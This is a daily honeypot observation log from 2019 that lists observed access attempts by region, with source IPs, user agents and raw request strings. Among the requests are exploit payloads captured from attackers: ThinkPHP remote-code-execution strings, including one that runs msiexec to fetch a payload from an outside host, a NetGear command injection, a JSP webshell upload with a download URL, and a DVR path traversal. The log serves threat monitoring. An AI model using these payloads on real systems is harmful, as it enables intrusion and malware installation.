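Honeypot (provisional) observation log for 2019/10/06.
Highlights
Region:AP
The following were observed:
Access attempts targeting a vulnerability in NetGear products
Access attempts targeting a vulnerability in ThinkPHP
Scanning for phpMyAdmin
Gh0stRAT-like activity
Region:US
The following were observed:
Access attempts targeting a vulnerability in HiSilicon DVR Devices
Access attempts targeting a vulnerability in ThinkPHP
Access attempts targeting jsp files
Region:EU
The following were observed:
Access attempts targeting a vulnerability in ThinkPHP
Other
Access count trend
AP: total accesses: 40 (change from previous day: -8)
US: total accesses: 129 (change from previous day: +109)
EU: total accesses: 19 (change from previous day: -16)
For practical reasons, GET / HTTP/1.1 and POST / HTTP/1.1 are excluded.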
Region:AP
Source IP addresses
Count | Source IP address | Country |
---|---|---|
1 | 111.11.101.46 | China |
2 | 111.61.77.228 | China |
2 | 122.169.229.236 | India |
1 | 122.224.88.26 | China |
2 | 123.252.218.38 | India |
2 | 14.152.90.89 | China |
2 | 14.185.64.121 | Vietnam |
4 | 148.70.56.154 | China |
2 | 185.31.163.237 | Russia |
2 | 192.186.5.85 | United States |
1 | 2.234.173.57 | Italy |
1 | 2.38.205.58 | Italy |
2 | 254.188.21.177 | - |
4 | 45.40.204.173 | China |
2 | 47.244.5.202 | China |
2 | 58.237.78.166 | South Korea |
2 | 60.216.248.90 | China |
2 | 61.175.240.62 | China |
1 | 66.240.205.34 | United States |
2 | 86.105.81.2 | Republic of Moldova |
1 | 87.197.136.28 | Slovakia |
UserAgent list
Count | UserAgent |
---|---|
2 | - |
2 | curl/7.55.1 |
2 | Go-http-client/1.1 |
3 | Hi |
21 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1) |
2 | Mozilla/5.0 |
2 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 |
6 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
1 | GET | /index.php | HTTP/1.1 |
1 | GET | /LoginPage.do | HTTP/1.1 |
3 | GET | /Pages/login.htm | HTTP/1.1 |
1 | GET | /phpmyadmin/index.php | HTTP/1.1 |
10 | GET | /public/index.php?s=index\/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/&currentsetting.htm=1 | HTTP/1.1 |
10 | GET | /?s=index%2F%5Cthink%5Capp%2Finvokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=mshta.exe%20vbscript:createobject(\"wscript.shell\").run(\"Cmd.exe%20/c%20for%20/l%20%i%20in%20(1,1,99)%20do%20(Msiexec%20/i%20http://Op[.]Cnazb[.]Xyz/PHP2.jpg%20/Q)\",0)(window.close) | |
2 | GET | /TP/index.php | HTTP/1.1 |
2 | GET | /TP/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
2 | GET | /TP/public/index.php | HTTP/1.1 |
1 | GET | /webdav/ | HTTP/1.1 |
1 | Gh0st\xad | ||
2 | POST | /images.php | HTTP/1.1 |
2 | POST | /TP/index.php?s=captcha | HTTP/1.1 |
1 | PROPFIND | / | HTTP/1.1 |
Region:US
Source IP addresses
Count | Source IP address | Country |
---|---|---|
1 | 168.181.153.17 | Brazil |
1 | 172.104.242.173 | United States |
6 | 188.156.84.49 | Hungary |
1 | 190.129.162.66 | Bolivia |
1 | 220.200.159.252 | China |
1 | 221.191.47.215 | Japan |
4 | 223.113.12.238 | China |
1 | 23.95.82.42 | United States |
1 | 43.226.152.51 | China |
1 | 45.134.146.16 | Germany |
10 | 49.235.56.52 | China |
101 | 68.183.201.217 | United States |
UserAgent list
Count | UserAgent |
---|---|
2 | - |
1 | Go-http-client/1.1 |
6 | Hi |
1 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) |
4 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1) |
1 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; The World) |
4 | Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) |
101 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
1 | - | ||
1 | GET | /elrekt.php | HTTP/1.1 |
1 | GET | /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fky[.]dfg45dfg45[.]best/download.exe | HTTP/1.1 |
1 | GET | /html/public/index.php | HTTP/1.1 |
1 | GET | http://www[.]google[.]com/ | HTTP/1.0 |
1 | GET | /index.php | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | ../../mnt/custom/ProductDefinition | HTTP |
6 | GET | /Pages/login.htm | HTTP/1.1 |
101 | GET | /phpmyadmin/ | HTTP/1.1 |
1 | GET | /public/index.php | HTTP/1.1 |
4 | GET | /public/index.php?s=index\/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/index.php | HTTP/1.1 |
1 | GET | /TP/public/index.php | HTTP/1.1 |
1 | HEAD | /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fky[.]dfg45dfg45[.]best/download.exe | HTTP/1.1 |
1 | POST | /index.php?s=captcha | HTTP/1.1 |
1 | PUT | /FxCodeShell.jsp%20 | HTTP/1.1 |
1 | PUT | /FxCodeShell.jsp::$DATA | HTTP/1.1 |
1 | PUT | /FxCodeShell.jsp/ | HTTP/1.1 |
Region:EU
Source IP addresses
Count | Source IP address | Country |
---|---|---|
1 | 103.207.49.251 | China |
2 | 104.211.216.163 | United States |
1 | 114.242.146.156 | China |
2 | 119.52.111.71 | China |
1 | 185.254.120.20 | Russia |
1 | 185.31.163.237 | Russia |
10 | 49.235.56.52 | China |
1 | 84.51.18.150 | Turkey |
UserAgent list
Count | UserAgent |
---|---|
1 | - |
1 | curl/7.55.1 |
1 | Go-http-client/1.1 |
3 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1) |
2 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 |
9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
2 | python-requests/2.22.0 |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
1 | GET | /elrekt.php | HTTP/1.1 |
1 | GET | /html/public/index.php | HTTP/1.1 |
2 | GET | /index.php | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /phpmyadmin | HTTP/1.1 |
1 | GET | /phpmyadmin/ | HTTP/1.1 |
1 | GET | /phpmyadmin/index.php | HTTP/1.1 |
1 | GET | /public/index.php | HTTP/1.1 |
3 | GET | /public/index.php?s=index\/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/index.php | HTTP/1.1 |
1 | GET | /TP/public/index.php | HTTP/1.1 |
1 | POST | /images.php | HTTP/1.1 |
1 | POST | /index.php?s=captcha | HTTP/1.1 |
1 | \x03 |